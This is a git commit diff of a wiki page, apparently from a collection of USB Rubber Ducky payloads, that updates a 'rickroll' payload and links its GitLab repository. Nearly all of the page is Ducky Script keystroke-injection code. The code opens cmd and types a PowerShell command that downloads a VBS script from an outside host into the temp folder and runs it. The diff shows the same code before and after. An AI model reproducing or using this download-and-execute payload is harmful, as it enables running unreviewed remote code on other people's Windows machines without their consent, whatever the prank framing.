Updated Payload rickroll (markdown)

This commit is contained in:
samvdkris 2017-02-28 16:24:12 +01:00
parent a77cc9c8a6
commit 245cd36683
1 changed files with 10 additions and 10 deletions

View File

@ -1,13 +1,13 @@
GitLab repo: https://gitlab.com/WarKitteh/arduino-hid-rickroll
Ducky code: 
`DELAY 1000 
GUI r 
DELAY 100 
STRING cmd 
DELAY 100 
ENTER 
DELAY 100 
STRING powershell (new-object System.Net.WebClient).DownloadFile('https://pixelcoding.nl/download/rickroll.vbs','%TEMP%\rickroll.vbs'); && start %TEMP%\rickroll.vbs && exit 
DELAY 100 
Ducky code:
`DELAY 1000
GUI r
DELAY 100
STRING cmd
DELAY 100
ENTER
DELAY 100
STRING powershell (new-object System.Net.WebClient).DownloadFile('https://pixelcoding.nl/download/rickroll.vbs','%TEMP%\rickroll.vbs'); && start %TEMP%\rickroll.vbs && exit
DELAY 100
ENTER`